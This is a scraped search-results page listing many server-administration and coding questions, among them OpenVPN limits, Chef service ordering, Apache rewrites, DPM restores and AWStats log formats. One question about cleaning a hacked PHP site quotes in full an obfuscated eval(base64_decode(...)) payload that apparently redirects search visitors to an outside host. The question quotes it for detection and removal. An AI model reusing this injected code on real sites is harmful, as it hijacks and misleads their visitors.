Search Results

Search found 88206 results on 3529 pages for 'code coverage'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 890/3529 | < Previous Page | 886 887 888 889 890 891 892 893 894 895 896 897  | Next Page >

  • chef deploy start service and restart service in sequence

    - by Ryan
    Chef stop and start service in sequence and would like to ask different procedure. Step 1: framework bootstrap to jboss service bash "bootstrap application" do code <<-EOF ant bootstrap EOF end Step 2: then start jboss service "jboss" do action :start end Step 3: install application bash "install application" do code <<-EOF ant install EOF end in between step 2 and 3, ant install returns error because jboss is not started yet. but successful on the 2nd run. obviously step 3 doesnt know if the jboss already started. how to do this on chef?

    Read the article

  • How can I set up OpenVPN to accept more than 60 connections?

    - by Robin
    Greetings! We're using OpenVPN and today hit an unexpected connection limit of 60 - even though max-clients is set to the source code default 1024. Server log: Tue Dec 21 13:49:41 2010 MULTI: new incoming connection would exceed maximum number of clients (60) We're slowly adding new clients to the VPN and expect to hit 200 some time next year, if we can get it working. We're running the server on a Win2003 R2. OpenVPN 2.0.9 Server config as follows: local 192.168.10.211 port 1195 proto tcp dev tun dev-node OpenVPN_Vision ca vision_ca.crt cert vision_server.crt key vision_server.key # This file should be kept secret dh vision_dh1024.pem server 192.168.211.0 255.255.255.0 ifconfig-pool-persist vision_ipp.txt ;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100 ;client-to-client keepalive 10 120 comp-lzo ;max-clients 100 # Default in source code is 1024 persist-key persist-tun status openvpn-status-vision.log log vision.log verb 3 I would greatly appreciate any help or input on this one. Thanks! Best regards, Robin

    Read the article

  • How to Disable secondary drive from booting upon restart - Windows

    - by DevCompany
    I had a Windows 2003 Hard Drive on my server and it went bad so I installed a new clean hard drive and installed Windows 2008 R2 on the new clean drive. I moved the old 2003 drive to be used only for general storage on the same computer. It usually boots into Windows 2008 upon a restart, but just sometimes it starts trying to boot the old 2003 drive and causes boot issues(NTDLR Bootloader, and other errors), even though the order of boot preference is set to boot 2008, and NOT 2003. I need to know how to remove any old code that keeps this old drive as a bootable drive. I still want to use it as a secondary drive just dont want to have any boot code on it. hopefully my situation is clear for everyone to get a good response. Thank you...

    Read the article

  • Website hosted on IIS is not accessbile

    - by Tola Odejayi
    I have two sites set up in IIS on a remote machine RM; one on regular port 80, and the other on port 5773. From my local machine LM, I can access the site on 80, but I cannot access the one on 5773; I get a status code of 502 and an error code of 10060 (A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond) when I try to do this. I can access the 5773 site via IIS when I am logged into RM (i.e. by right clicking on a page on the site and going 'Browse'). I can also access pages on the 5773 site via a browser, again when I am logged into RM. I just can't do the same via a browser when I am logged into LM. I have ensured that port 5773 is open for outgoing traffic on LM. Could the problem be that I also need to ensure that port 5773 is open for inbound traffic on RM?

    Read the article

  • PHP failing to connect to GMail via IMAP [Edited!!]

    - by Alexander
    I have some php code that I'm trying to use to connect to gmail using imap. Here's the code: $hostname = '{imap.gmail.com:993/imap/ssl/novalidate-cert}INBOX'; $tmp_username = 'username'; $tmp_password = 'password'; $inbox = imap_open($hostname, $username, $password) or die(imap_last_error()); And I get this error output everytime i try to connect: Warning: imap_open() [function.imap-open]: Couldn't open stream {imap.gmail.com:993/imap/ssl/novalidate-cert}INBOX in /var/www/PHP/EmailScript.php on line 14 Login aborted I dont understand what could be wrong!! I've heard of people having SSL errors but this doesnt seem to be one of those. Please please please help me!!!!! Edit: When trying to connect to imap.gmail.com through telnet-ssl i get the following output: Trying 74.125.155.109... Connected to gmail-imap.l.google.com. Escape character is '^]'. And Nothign else happens

    Read the article

  • TextMate - completion using an external file or file contained in project?

    - by Neil Baldwin
    Does anyone know how to get TextMate to search an external file (or even the files contained in a TextMate "project") with which to perform word completion? I'm coding some stuff on the C64 (using TextMate to write the code) and I have an external file containing labels for all of the hardware registers/kernal routines e.g VIC2InteruptStatus = $D019 It would be really handy to be able to type, say, 'VIC2I' then press the key for word completion and have TextMate find matches in the external library file. Rather than how I'm having to do it at the moment by opening the library file and copy-paste the register names into my code.

    Read the article

  • Apache rewrite module, 404 not found

    - by Eneroth3
    I've been having some problems with rewriting directory styled addresses into query strings for my php scripts. Here's the code RewriteRule ^(\w+)/?(\w+)?/?(\w+)?/?$ /index.php?section=$1&category=$2&subcategory=$3 [QSA] This line works perfectly fine on both my local wamp and lamp server, and my friend's lamp server. However on the web hotel I've been using (freehostia) I only get a 404 error when trying to browse a "directory" that isn't really there (supposed to be generated by php). I've tried connecting their support but they only say 3rd party applications aren't their job. I know rewriteEngine is turned on because some basic redirect attempts have worked. Perhaps this line of code could be better written? It's quite important that extra queries are appended and would be nice (but not necessary) if the last slash could be left out. Any help is appreciated :)

    Read the article

  • oddities in interference of linux extened ACLs and 'regular' permissions

    - by abbot
    I've got some legacy code which checks that some file is read-only and readable only by it's owner, i.e. permissions set to 0400. I also need to give read-only access to this file to some other user on the system. I'm trying to set extended ACLs, but this changes 'regular' permission bits in a strange way also: $ ls -l hostkey.pem -r-------- 1 root root 0 Jun 7 23:34 hostkey.pem $ setfacl -m user:apache:r hostkey.pem $ getfacl hostkey.pem # file: hostkey.pem # owner: root # group: root user::r-- user:apache:r-- group::--- mask::r-- other::--- $ ls -l hostkey.pem -r--r-----+ 1 root root 0 Jun 7 23:34 hostkey.pem And after this the legacy code starts complaining that the file is group-readable (while it is actually not!) Is it possible to set the extended ACLs in such a way that some other user will also have read-only access, while the file will appear to have only 0400 'regular' permissions?

    Read the article

  • ASP.NET, URL Rewriting and threads on Linux?

    - by acidzombie24
    Right now converting my normal sql(ite) syntax into compatible MS Server syntax is driving me mad. My code seems to be mono compatible judging by MoMA. However in global.asax i start several threads in Application_Start to use as a service and excessive url rewrites in Application_BeginRequest (everything is rewriting into default.aspx which calls C# code/class baded on the url). The urls do not have extensions or my have false extentions ie mysite.com/username/page/title.lol - id I need it all to go to BeginRequest. I also need files to be downloadable. Usually the path will be rewritten as from /file/user/filename to /file/u/s/user/file. Would this be supported on linux+mono+a good webserver?

    Read the article

  • windows 7 frequently crashes when running 64 bit debian on virtualbox

    - by erin c
    I've been having some hard times with Virtualbox. I use it to run 64-bit Debian guest on a Windows 7 host to be able to code for linux systems. It generally crashes when I build my code in eclipse cdt, or if I am doing some intensive operations. Should I lower the memory and core usage? Is this some sort of virtualbox problem? I upgraded to virtualbox v4.1.8 and the problem still occurs. My virtual machine instance uses 1736MB out of 4GB of ram, and I use 2 out of 8 processor cores. But still, the whole thing crashes 1 or 2 times every single day.

    Read the article

  • DPM 2010 PowerShell Script to Easily Restore Multiple Files

    - by bmccleary
    I’ve got what I thought would be a simple task with Data Protection Manager 2010 that is turning out to be quite frustrating. I have a file server on one server and it is the only server in a protection group. This file server is the repository for a document management application which stores the files according to the data within a SQL database. Sometimes users inadvertently delete files from within our application and we need to restore them. We have all the information needed to restore the files to include the file name, the folder that the file was stored in and the exact date that the file was deleted. It is easy for me to restore the file from within the DPM console since we have a recovery point created every day, I simply go to the day before the delete, browse to the proper folder and restore the file. The problem is that using the DPM console, the cumbersome wizard requires about 20 mouse clicks to restore a single file and it takes 2-4 minutes to get through all the windows. This becomes very irritating when a client needs 100’s of files restored… it takes all day of redundant mouse clicks to restore the files. Therefore, I want to use a PowerShell script (and I’m a novice at PowerShell) to automate this process. I want to be able to create a script that I pass in a file name, a folder, a recovery point date (and a protection group/server name if needed) and simply have the file restored back to its original location with some sort of success/failure notification. I thought it was a simple basic task of a backup solution, but I am having a heck of a time finding the right code. I have seen the sample code at http://social.technet.microsoft.com/wiki/contents/articles/how-to-use-a-windows-powershell-script-to-recover-an-item-in-data-protection-manager.aspx that I have tried to follow, but it doesn’t accomplish what I really want to do (it’s too simplistic) and there are errors in the sample code. Therefore, I would like to get some help writing a script to restore these files. An example of the known values to restore the data are: DPM Server: BACKUP01 Protection Group: Document Repository Data Protected Server: FILER01 File Path: R:\DocumentRepository\ToBackup\ClientName\Repository\2010\07\24\filename.pdf Date Deleted: 8/2/2010 (last recovery point = 8/1/2010) Bonus Points: If you can help me not only create this script, but also show me how to automate by providing a text file with the above information that the PowerShell script loops through, or even better, is able to query our SQL server for the needed data, then I would be more than willing to pay for this development.

    Read the article

  • How to tell httpd to preserve the proxied error message?

    - by ZNK - M
    I have an httpd server proxying the requests to 2 different tomcat servers. One of my server handles the authentication and returns a specific http error code 521 when the user already have a running session. My issue is httpd automatically maps this 521 error code to a 500 (internal server error) and then my client can not handle it properly. I have tried to disable ProxyErrorOverride, to remove the /error/HTTP_INTERNAL_SERVER_ERROR.html.var but it does not changes anything. How can I ask httpd to not change anything to the proxied message? <IfModule proxy_module> ProxyPass /context1 http://127.0.0.1:8001/context1 ProxyPass /context2 http://127.0.0.1:8002/context2 ProxyPreserveHost Off ProxyErrorOverride Off </IfModule> Thanks in advance httpd 2.2.22 (Win32) mod_ssl tomcat 7.25 windows 7 64-bits

    Read the article

  • Labels mail merge repeats on subsequent pages?

    - by leeand00
    I'm trying to do a mail merge to print to labels. The first field in the document does not contain a { NEXT } field code, and because of this the records repeat between label pages for example: Notice how the records shift to the left as the next page is displayed? But how they start over again in an off by one manner? Now I've tried to fix this by using the first record displayed on a page to see if the page number is 1. If it not on page 1 of the mail merge then it should just move to the next record; otherwise it should just display the first record: This doesn't work however, because when I do the preview and display the {page} field code, it reports that I am always on page 1 and thus the same behavior continues instead of just moving to the next record on the next page.

    Read the article

  • AWStats log format for tomcat access logs which has X-Forwarded-For

    - by Nix
    What should be the AWStats log format for below tomcat access logs ? I tried these formats but the external IP addresses are not coming into AWStats reports. LogFormat="%host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot %referer %other %other" LogFormat="%other %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot %host_proxy" tomcat valve settings: pattern="%h %l %{USER_ID}s %t &quot;%r&quot; %s %b &quot;%{Referer}i&quot; &quot;%{User-Agent}i&quot; &quot;X-Forwarded-For=%{X-Forwarded-For}i&quot; &quot;JSESSIONID=%{JSESSIONID}c&quot; %D" Log entry: 127.0.0.1 - - [04/Nov/2013:13:39:55 +0000] "GET / HTTP/1.1" 200 12345 "https://www.google.com/url?some_url" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36" "X-Forwarded-For=real_ip, proxy_server_internal_ip" "JSESSIONID=-" 12345

    Read the article

  • Advantages of a deployment tool over shell

    - by Jimmy
    Currently I have all of my deployment scripts in shell, which installs about 10 programs and configures them. The way I see it shell is a fantastic tool for this: Modular: Only one program per script, this way I can spread the programs across different servers Simple: Shell scripts are extremely simple and don't need any other software installed One-click: I only have to run the shell script once and everything is setup Agnostic: Most programmers can figure out shell, and don't need to know how to use a specific program. Versioning: Since my code is on github a simple git pull and restart all of supervisor will run my latest code. My question is, with all of these advantages, why is it people are constantly telling me to use a tool such as ansible or chef, and not to use shell.

    Read the article

  • Synchronize the same set of files to 2 different locations with 2 different programs for 2 different purposes

    - by Hedgetrimmer
    Because of stupid questionable IT policies at my not-to-be-named place of occupation, I have been (and will be, for the forseeable future) carrying on an external hard drive a unison-synchronized copy of all of my documents and code, including code which resides in some of my "dotfiles" and other code which resides in ~/bin (things I've made are there because ~/bin is in my $PATH) along with some cruft generated (and to be generated) by conscript and its related "giter8" templating system for Scala project boilerplates. Despite this, I do use a symlinking program to store all of my important dotfiles in a subdirectory. Thanks to that somewhat complicated setup, I have resorted to making a directory full of symlinks to every directory (or file, as is the case with stuff under ~/bin) that I want synchronized, and then follow = True is in my unison profile. It happens to be that this collection of odds and ends—plus an automatically-generated text file containing every package installed on my system—is everything under ~ that needs to be backed up to a remote (rsync-over-ssh) host with client-side encryption and signing from GPG. I already believe that duplicity is the most appropriate program to do that. What isn't as clear-cut is how to make duplicity use the exact same set of files when it runs a backup; it would be simple if duplicity would follow symlinks, but it does not and the manpage lists no option for enabling any such behavior. Comparing unison's file selection algorithm to duplicity's, I don't think I can write a program that could compute a ruleset for one program given one for the other. For the record, I would rather not keep the symlinks manually synchronized with duplicity file-selection rules, as they can change thanks to the above-mentioned complications regarding ~/bin. I don't think running duplicity on the external hard disk is such a good idea either; I usually keep that hard disk unmounted and unplugged in case of a power failure or other physical problem with the computer, plus I'm not sure about duplicity's performance given that: the hard disk is NTFS-formatted in order to be useable at my Windows-imprisoned place of occupation. despite being a USB 3.0 disk, my computer has no USB 3.0 ports so it acts as a USB 2.0 disk. How can I have duplicity (or is there a better program that I have overlooked?) back up the exact same set of files that is bidirectionally synchronized with my external hard disk?

    Read the article

  • Indenting an x number of lines in vim

    - by Mack Stump
    I've been coding in Java for a job recently and I've noticed that I'll write some code and then determine that I need to wrap the code in a try/catch block. I've just been moving to the beginning of a line and adding a tab. 0 i <tab> <esc> k (repeat process until at beginning or end of block) Now this was fine the first three or four times I had to indent but now it's just become tedious and I'm a lazy person. Could someone suggest an easier way I could deal with this problem?

    Read the article

  • 504 Gateway Time-out after php fatal error

    - by tiagojsag
    I'm using nginx and php-fpm to develop a symfony2 based website, under ubuntu 12.10 (yes, I know I'm using a beta OS). Everything was working out fine until, due to an error on my code, I called an unexisting function, and got the following: Fatal error: Call to a member function (....) This isn't a problem (it's a bug in my code, easily fixable), but after this, no other page loads. My browser just keeps trying to load the page from the webserver, until nginx timeouts (after +- 30s, which should be some default timeout) and returns: 504 Gateway Time-out Restarting php-fpm solves the issue. Nginx logs show a timeout message, and nothing appears on php-fpm logs, even if I set them to debug level. I tried switching from fpm to fastcgi, and the same thing happens. I've looked around, but all similar error are related to big requests/file handling, which isn't the case. All the pages on my website load in a few seconds, even under development conditions (no caching, etc).

    Read the article

  • grep, xargs, sed to clean up PHP eval hack

    - by roktechie
    I'm attempting to use the commands found on http://devilsworkshop.org/tutorial/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/55587/ to clean up a PHP eval based hack on a site. Sample code to match/remove <?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9sb29wZG93bi5sZmxpbmt1cC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9")); Attempted command: sudo grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | sudo xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g' The sudo has been added as it is required to have permission to read/write on the dir I'm accessing. The files list properly from grep, but are not changed by sed. Any suggestions?

    Read the article

  • My computer keeps restart when accept Skype call

    - by hvtuananh
    I'm using latest Skype version (4.2) on Windows XP SP3 My computer keeps restart when I click "Accept" button on Skype call Windows Update is running and I've already installed all updates What's wrong with my computer? How to fix it? EDIT: I only see this error in Event Viewer Event Type: Error Event Source: System Error Event Category: (102) Event ID: 1003 Date: 3/2/2010 Time: 3:47:50 PM User: N/A Computer: TUANANH Description: Error code 1000000a, parameter1 ffffff94, parameter2 0000001c, parameter3 00000000, parameter4 80537bf1. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 53 79 73 74 65 6d 20 45 System E 0008: 72 72 6f 72 20 20 45 72 rror Er 0010: 72 6f 72 20 63 6f 64 65 ror code 0018: 20 31 30 30 30 30 30 30 1000000 0020: 61 20 20 50 61 72 61 6d a Param 0028: 65 74 65 72 73 20 66 66 eters ff 0030: 66 66 66 66 39 34 2c 20 ffff94, 0038: 30 30 30 30 30 30 31 63 0000001c 0040: 2c 20 30 30 30 30 30 30 , 000000 0048: 30 30 2c 20 38 30 35 33 00, 8053 0050: 37 62 66 31 7bf1

    Read the article

  • Website visitors are still being redirected after "fixing" the damage from a conditional redirect website attack

    - by Shannon
    BACKGROUND A website of mine was recently the target of a conditional redirect attack. PHP code was added to my pages to redirect visitors. The .htaccess file was edited to redirect visitors. I've re-uploaded my website so the compromised PHP and .htaccess code have both been removed. My site is mostly handwritten php and static HTML content. I don't use page comments or any third party libraries. THE PROBLEM After removing the compromised php and htaccess files, visitors are still being re-directed. What could be the reason that visitors are still being redirected? Are there any tools to check where/how redirects are taking place so I can debug the problem? UPDATE - PROBLEM FIXED As suggested in the comments, I cleared my Firefox cache and that fixed the problem (for me anyway). Visitors with old cache data will obviously still be re-directed.

    Read the article

  • Sharepoint 2007 Event ID 6482

    - by Dave M
    Our two server SharePoint 2007 SP2 farm has an issue. Event ID 6482 appears in the Application log of the Web front end many times a day. Often many time a minute. The full error is from Office SharePoint Server Event Type: Error Event Source: Office SharePoint Server Event Category: Office Server Shared Services Event ID: 6482 Date: 11/12/2009 Time: 3:05:22 PM User: N/A Computer: XXXXXX Description: Application Server Administration job failed for service instance Microsoft.Office.Server.Search.Administration.SearchServiceInstance (36a9b7ef-59aa-4f94-8887-8bf7b56f2f91). Reason: Error during encryption or decryption. System error code 0. Techinal Support Details: System.ArgumentException: Error during encryption or decryption. System error code 0. at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.SynchronizeDefaultContentSource(IDictionary applications) at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.Synchronize() at Microsoft.Office.Server.Administration.ApplicationServerJob.ProvisionLocalSharedServiceInstances(Boolean isAdministrationServiceJob) For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. The SharePoint site appears to be functioning normally and Search returns expected results. Any suggestions would be appreciated

    Read the article

  • Rack processes taking over CPU under Passenger

    - by pjmorse
    I have a Spree site running the following stack: Nginx 1.0.8 Passenger 3.0.9 Ruby 1.9.2-p290 Rack 1.3.6 Rails 3.1.4 Spree 0.70.5 I recently upgraded from Spree 0.70.3, which also brought a Deface upgrade from 0.7.x to 0.8.0. Since then things have been very unstable. Recently we've seen some CPU-hogging processes which drive load up on the server and grind the whole thing to a stop. They're Rack processes and it looks like Passenger is starting them; they're owned by the site-runner user, an unprivileged user who owns the application code. (Passenger automatically runs the site code as the user who owns it.) If I restart Nginx and kill the runaway processes, it helps for a while, but eventually similar processes return and bog things down again. How can I figure out what's starting these processes, what they're trying to do, and how to stop them?

    Read the article

  • VBA - Instead of ActiveExplorer.Selection to set folder, explicitly set folder path

    - by Mike
    Sub MoveItems() Dim Messages As Selection Dim Msg As MailItem Dim NS As NameSpace Set NS = Application.GetNamespace("MAPI") Set Messages = ActiveExplorer.Selection If Messages.Count = 0 Then Exit Sub End If For Each Msg In Messages Msg.Move NS.Folders("Personal Folders").Folders("SavedMail") Next End Sub This code will move all email messages from the currently selected folder in outlook to another folder (SavedMail). I would like to edit the code so that instead of using the currently selected folder as the source for the messages, there would be a hard-coded folder - something like Set Messages = NS.Folders("Personal Folders").Folders("Moved"). I'm a VBA rookie and tried just replacing the Set Messages line with this which resulted in a Run-time error '13': Type mismatch which I think refers to a mismatch of the Dim Messages and the Set Messages commands. I've tried using different Dim definitions with no luck. I'm guessing that someone who knows VBA will see the way to do this right away. Any help would be greatly appreciated. Thanks.

    Read the article

  • LdapErr: DSID-0C0903AA, data 52e: authenticating against AD '08 with pam_ldap

    - by Stefan M
    I have full admin access to the AD '08 server I'm trying to authenticate towards. The error code means invalid credentials, but I wish this was as simple as me typing in the wrong password. First of all, I have a working Apache mod_ldap configuration against the same domain. AuthType basic AuthName "MYDOMAIN" AuthBasicProvider ldap AuthLDAPUrl "ldap://10.220.100.10/OU=Companies,MYCOMPANY,DC=southit,DC=inet?sAMAccountName?sub?(objectClass=user)" AuthLDAPBindDN svc_webaccess_auth AuthLDAPBindPassword mySvcWebAccessPassword Require ldap-group CN=Service_WebAccess,OU=Groups,OU=MYCOMPANY,DC=southit,DC=inet I'm showing this because it works without the use of any Kerberos, as so many other guides out there recommend for system authentication to AD. Now I want to translate this into pam_ldap.conf for use with OpenSSH. The /etc/pam.d/common-auth part is simple. auth sufficient pam_ldap.so debug This line is processed before any other. I believe the real issue is configuring pam_ldap.conf. host 10.220.100.10 base OU=Companies,MYCOMPANY,DC=southit,DC=inet ldap_version 3 binddn svc_webaccess_auth bindpw mySvcWebAccessPassword scope sub timelimit 30 pam_filter objectclass=User nss_map_attribute uid sAMAccountName pam_login_attribute sAMAccountName pam_password ad Now I've been monitoring ldap traffic on the AD host using wireshark. I've captured a successful session from Apache's mod_ldap and compared it to a failed session from pam_ldap. The first bindrequest is a success using the svc_webaccess_auth account, the searchrequest is a success and returns a result of 1. The last bindrequest using my user is a failure and returns the above error code. Everything looks identical except for this one line in the filter for the searchrequest, here showing mod_ldap. Filter: (&(objectClass=user)(sAMAccountName=ivasta)) The second one is pam_ldap. Filter: (&(&(objectclass=User)(objectclass=User))(sAMAccountName=ivasta)) My user is named ivasta. However, the searchrequest does not return failure, it does return 1 result. I've also tried this with ldapsearch on the cli. It's the bindrequest that follows the searchrequest that fails with the above error code 52e. Here is the failure message of the final bindrequest. resultcode: invalidcredentials (49) 80090308: LdapErr: DSID-0C0903AA, comment: AcceptSecurityContext error, data 52e, v1772 This should mean invalid password but I've tried with other users and with very simple passwords. Does anyone recognize this from their own struggles with pam_ldap and AD? Edit: Worth noting is that I've also tried pam_password crypt, and pam_filter sAMAccountName=User because this worked when using ldapsearch. ldapsearch -LLL -h 10.220.100.10 -x -b "ou=Users,ou=mycompany,dc=southit,dc=inet" -v -s sub -D svc_webaccess_auth -W '(sAMAccountName=ivasta)' This works using the svc_webaccess_auth account password. This account has scan access to that OU for use with apache's mod_ldap.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 886 887 888 889 890 891 892 893 894 895 896 897  | Next Page >